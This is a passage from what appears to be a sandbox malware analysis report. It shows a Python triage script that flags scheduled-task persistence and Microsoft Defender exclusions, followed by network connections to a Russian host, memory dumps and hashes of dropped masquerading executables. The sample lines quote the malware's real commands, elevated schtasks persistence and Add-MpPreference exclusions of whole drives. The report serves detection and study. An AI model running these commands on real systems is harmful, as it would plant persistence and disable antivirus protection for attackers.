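        "every_minutes": int(m["mod"]) if m["mod"] else None,
        "exe": m["cmd"],                           # the single quotes are already stripped
        "highest": m["rl"] is not None,            # /rl HIGHEST = runs elevated
    }


def masquerades(exe):
    """True when the file name imitates a Windows process but lives elsewhere."""
    p = PureWindowsPath(exe)
    if p.stem.lower() not in WINDOWS_PROCESS_NAMES:
        return False
    return p.parent not in TRUSTED_DIRS   # PureWindowsPath compares case-insensitively


def triage(lines):
    """One finding per suspicious line: {"severity", "reason", "line"}."""
    findings = []
    for line in lines:
        task = parse_schtask(line)
        if task is not None:
            reasons = []
            if masquerades(task["exe"]):
                reasons.append("Windows process name outside a trusted directory")
            if task["highest"]:
                reasons.append("task runs elevated (/rl HIGHEST)")
            if task["schedule"] == "MINUTE" and task["every_minutes"] and task["every_minutes"] <= 15:
                reasons.append(f"relaunched every {task['every_minutes']} minutes")
            if reasons:
                findings.append({"severity": "high", "reason": "; ".join(reasons), "line": line})
            continue
        m = EXCLUSION_RE.search(line)
        if m is not None:
            broad = m["path"].lower() in BROAD_EXCLUSIONS
            findings.append({
                "severity": "high" if broad else "medium",
                "reason": f"Defender exclusion added for {m['path']}",
                "line": line,
            })
    return findings


def persisted_targets(lines):
    """Sorted, de-duplicated list of the executables the tasks keep alive."""
    return sorted({t["exe"] for t in map(parse_schtask, lines) if t is not None})


SAMPLE_LINES = [  # copied from the Processes list of this report
    r'''schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /f''',
    r'''schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /rl HIGHEST /f''',
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f["severity"].upper(), f["reason"])
    print("persisted executables:", *persisted_targets(SAMPLE_LINES), sep="\n  ")
```

The same fields map directly onto Sysmon event 1 (schtasks.exe with /create in CommandLine) or event 4698 task-creation logs; persisted_targets gives the file list to pull for hashing, and every path it returns here also appears in the Files section below.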

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 42.197.8.141.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 3.166.122.92.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

memory/228-0-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp

memory/228-1-0x0000000000380000-0x00000000006BC000-memory.dmp

memory/228-2-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-3-0x0000000000F90000-0x0000000000F9E000-memory.dmp

memory/228-4-0x0000000002860000-0x000000000286E000-memory.dmp

memory/228-5-0x000000001BA60000-0x000000001BA68000-memory.dmp

memory/228-6-0x000000001BA70000-0x000000001BA8C000-memory.dmp

memory/228-8-0x000000001BA90000-0x000000001BA98000-memory.dmp

memory/228-9-0x000000001BAA0000-0x000000001BAB0000-memory.dmp

memory/228-7-0x000000001BAE0000-0x000000001BB30000-memory.dmp

memory/228-10-0x000000001BAB0000-0x000000001BAC6000-memory.dmp

memory/228-12-0x000000001BB30000-0x000000001BB40000-memory.dmp

memory/228-11-0x000000001BAD0000-0x000000001BAD8000-memory.dmp

memory/228-13-0x000000001BB40000-0x000000001BB4A000-memory.dmp

memory/228-14-0x000000001BB50000-0x000000001BBA6000-memory.dmp

memory/228-15-0x000000001BBA0000-0x000000001BBAC000-memory.dmp

memory/228-16-0x000000001BBB0000-0x000000001BBB8000-memory.dmp

memory/228-17-0x000000001BBC0000-0x000000001BBCC000-memory.dmp

memory/228-18-0x000000001BBD0000-0x000000001BBD8000-memory.dmp

memory/228-19-0x000000001BBE0000-0x000000001BBF2000-memory.dmp

memory/228-20-0x000000001C140000-0x000000001C668000-memory.dmp

memory/228-22-0x000000001BC20000-0x000000001BC2C000-memory.dmp

memory/228-21-0x000000001BC10000-0x000000001BC1C000-memory.dmp

memory/228-23-0x000000001BC30000-0x000000001BC3C000-memory.dmp

memory/228-24-0x000000001B150000-0x000000001B15C000-memory.dmp

memory/228-25-0x000000001BE80000-0x000000001BE88000-memory.dmp

memory/228-30-0x000000001BE50000-0x000000001BE5C000-memory.dmp

memory/228-29-0x000000001BE40000-0x000000001BE4E000-memory.dmp

memory/228-28-0x000000001B180000-0x000000001B188000-memory.dmp

memory/228-27-0x000000001B170000-0x000000001B17E000-memory.dmp

memory/228-26-0x000000001B160000-0x000000001B16A000-memory.dmp

memory/228-31-0x000000001BE60000-0x000000001BE68000-memory.dmp

memory/228-32-0x000000001BE70000-0x000000001BE7A000-memory.dmp

memory/228-34-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-33-0x000000001BED0000-0x000000001BEDC000-memory.dmp

memory/228-37-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-38-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

C:\Windows\es-ES\fontdrvhost.exe

MD5 1553f67a0859a3057cde01f77db9dbc0
SHA1 2cfe40d1fea16093e16c96a35f3240b98da9a5e1
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
SHA512 4ff68e4ad4299aa2ca2be8dfd1742d641cf9aee6b687f94b1e3c68062630b2e167a13550a8a184c8ff5a3df1da5b3182ebd29759a84a219af37a8688df6f0de5

C:\Windows\es-ES\fontdrvhost.exe

MD5 b1377edb5c7395d31186330b4fd7d765
SHA1 b62990a719b9d21207199b75289bdf33b538698e
SHA256 9298f57897b97818653f7924436abb4830f7d44845eb0206dd4cc09878940752
SHA512 ec727ed321f020368a39e036eb244a247b4e6ae0ecaead1f40b9d514da72db7c7ef6db09c3b455c1234eff0adb6d5232e1af7e0eb3a76823319455d2420efcc3

C:\Recovery\WindowsRE\explorer.exe

MD5 084a5938ce77b9383a43d5379c773a31
SHA1 34b37f96202f81e8a34421020421290f0d1d61ff
SHA256 e493068c68472f3fbaf14f1d126c4861805f5e1cbf1356279ca283ca72177b9d
SHA512 f52ea959e51b7a7df7f7be23578c1b201ea1e4e7b9fdd9227a3883c03e9aa0ff7e2b4d2ae160255f794c840e116d93a1fcfd7c12b37b013f837d087ee9151bae

C:\Program Files (x86)\Windows Photo Viewer\wininit.exe

MD5 a3a56880e371bb4b5ff3f4e28791b5a5
SHA1 ccfe35536a1b3c8c5f73bd14dce0c44b19ba34ce
SHA256 2591daab5ada3d5417b33d7ba183edd7b29ee6b71bcb8617427d9d45f317357c
SHA512 4b4527e62a9ae19fc12fc5307ad5767bb1bb5216dc9dff07e56a801d3a0ae7c3235f68e6d60d7055698d07dc3a9c6496d6ad1bb9ff7a09dfbb2682211be17c70

C:\Program Files\dotnet\RCX716D.tmp

MD5 3d1fc8efc678bfb40a5f49845c25a3cb
SHA1 256a956945e7e21ae94980e02a68a367c27d6134
SHA256 1e17e7d23ffbbe052329b2938d5dace678d66ee4e1c2c2677534806bc728b056
SHA512 fc2e8df616e30c2c118b8932c6f4df7986ea808bfe7d913171aacf1f3a63f3e27ae859dda061e78b83102be866ce48ad8f473ede10d4e3714be7fd05badfaa7c

C:\ProgramData\Microsoft\Windows\Start Menu\dwm.exe

MD5 b0c249b693a72c5ff1a062672062d7e3
SHA1 e33a8e952d7f4c47248f3e14f7f21f7b9f404d9b
SHA256 6d4eb0464a83df85cc2658a6ddf86dde7ee67b59b07040d30b826b9ab93fde8d
SHA512 e3ec6b3a1380dfada3e6ccaaa2f94ba1206a048d6be7efcba5504e8625826e0ed607e02f13a29668ae1d6615cddd9a7ba2c7ad2392cc871a414843db3dabafeb

C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe

MD5 89f6cd1f773d3a1ead6be3afb295c88d
SHA1 ba44492cc4ca4a7b9299929f51ced2c1a8e63dc9
SHA256 ac2240e7b5af0107e910c06c8d1335cc3b81473f038e99e813f9adb63349d7c1
SHA512 7fe1399398abfa5cb58caf07001957951ac7f5db8fe2129d8e0d617066955b5608f962569604607ae9279f145a71deca4de72dd617b4ad79b2223c58c139169b

C:\Users\Admin\Music\TextInputHost.exe

MD5 630af483ee3b5912b48f536e87e36bbe
SHA1 9c41f8263dfa41bc59bcfdc94c4b8a9fe9b501f5
SHA256 c9d2dfbe883bc0e8e928b007ffbcbad20be8184f864cbf042dfd654b5531be18
SHA512 7ecb991bc5e12136aea5fc5502b9b5f46cfc4828d45fb435f95c63abb2e3a77c9a86c34a3007bc3b90a7749a58dca8813ae49b74ccb2bd5a2797bd00e6c6b6a0

C:\Recovery\WindowsRE\RuntimeBroker.exe

MD5 be05449cab989bfd4746a79de768ea0a
SHA1 b9a6621f50cf0bd585018234cbd88dfd08b6a4da
SHA256 bf6e2194e5eb468002440144ea8ad581afae778463d67cc6867172e292fc1747
SHA512 1016d56e8df32853b0de263b09bce6320e1819cf107404d3c7aecee6f811647685bc075b2a3b5881f5454b7e39d2e57bda1056ad4c2b235c3d5d72bfa2b9a1ce

memory/3372-336-0x00000288C7A80000-0x00000288C7AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2blqgxt4.u1e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4684-447-0x0000000000F60000-0x000000000129C000-memory.dmp

memory/228-448-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
